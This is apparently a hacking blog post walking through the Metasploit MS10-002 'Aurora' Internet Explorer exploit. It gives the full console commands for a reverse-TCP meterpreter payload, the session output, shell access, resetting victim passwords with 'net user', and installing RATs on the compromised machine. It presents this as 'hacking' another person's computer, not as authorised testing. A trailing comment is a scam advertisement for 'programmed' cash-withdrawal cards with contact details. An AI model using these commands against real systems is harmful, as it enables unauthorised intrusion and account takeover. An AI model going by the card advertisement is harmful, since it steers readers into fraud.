Hacking a Remote Computer or Web Server With Metasploit

Before continuing, read our Disclaimer

BEFORE I START LETS KNOW WHAT IS METASPLOIT
Metasploit is a Penetration testing tool by Rapid7

Download Metasploit here

Now install it.

METASPLOIT is an exploitation framEwork, written in Ruby.
It has a wide range of pre developed exploits and few usefull application like "nmap" attached with it.It was primarily developed for penetration testing but now it has come out to be must needed tool for hackers

So lets start hacking!
start msfconsole Start>Search>msfconsole
or in Linux ./msfconsole
Start by typing
Code:
help
It will show all commands.
Some stuff abOUt metasploit.

Exploits are methods by which u can get into another system
Payloads are stuff that are injected into other computers when u exploit them

What payloads can do?
They can execute commands or a special shell can function as a RAT(meterpreter).

What are encoders?
Encoders prevent detection by Anti-viruses

Okay now to the serious stuff!

in the console, u can exploit other computers, here i will show yhu aboutt the famous internet explorer Aurora hack.

#1 Windows IE Aurora
type in the following commands
Code:
msf > use exploit/windows/browser/ms10_002_aurora

msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_002_aurora) > set LHOST (your IP)

msf exploit(ms10_002_aurora) > set URIPATH /

msf exploit(ms10_002_aurora) > exploit
Now it will show like this (but with ur ip)

Code:
[*] Exploit running as background job.

[*] Started reverse handler on port 4444

[*] Local IP: http://192.168.0.151:8080/

[*] Server started.
P.S:-Server is run on Ruby on Rails so u need to portforward.Do not know how? See Here Port Forward ME!!!

Open Internet Explorer on a vulnerable machine and enter the Local IP URL(i.e the Local IP that metasploit displayed here it is http://192.168.0.151:8080/) into the browser. If the exploit succeeds, you should see a new session in the Metasploit .

Console:
Code:
[*] Sending stage (723456 bytes)

[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1

[*] Starting interaction with 1...
meterpreter > getuid

Server username: WINXP\PakH3X0r
now type
Code:
shell
and u can toy with that computer!!!.
P.s:- to change passwords

Code:
net user [user_name] [new_password]
You can then install RATS or ur favorite tool..

Categories:

1 comments:

If you are in need of financial Help, don't hesitate to place an order for a program card that can withdraw any amount you want. Deserve Cards are very transparent and easy to deal with. You can Purchase Deserve cards that can withdraw up to $50,000 to $100,000 limit without being detected because of the programming of the card. I'm extremely grateful to them for being honest with their words and delivering the card to me. This is the third day of receiving the card and I have withdrawn $9,500 from the Deserve Programmed Card. I tried purchasing the card previously from someone else, but it never arrived until I tried skylink technology for those in need of more money, you can also contact them. you can place order for the card Via whatsapp +1(213)785-1553 or their Email: skylinktechnes@yahoo.com